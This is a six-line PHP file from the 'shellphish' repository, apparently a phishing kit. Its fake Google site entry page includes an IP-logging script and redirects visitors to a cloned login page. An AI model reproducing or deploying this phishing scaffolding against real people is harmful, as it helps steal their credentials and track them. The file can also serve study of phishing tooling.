Files
shellphish/sites/google/index.php
The Linux Choice 5bfb0d0786 v1.0
2018-06-22 19:14:38 -03:00

6 lines
64 B
PHP

<?php
include 'ip.php';
header('Location: login.html');
exit
?>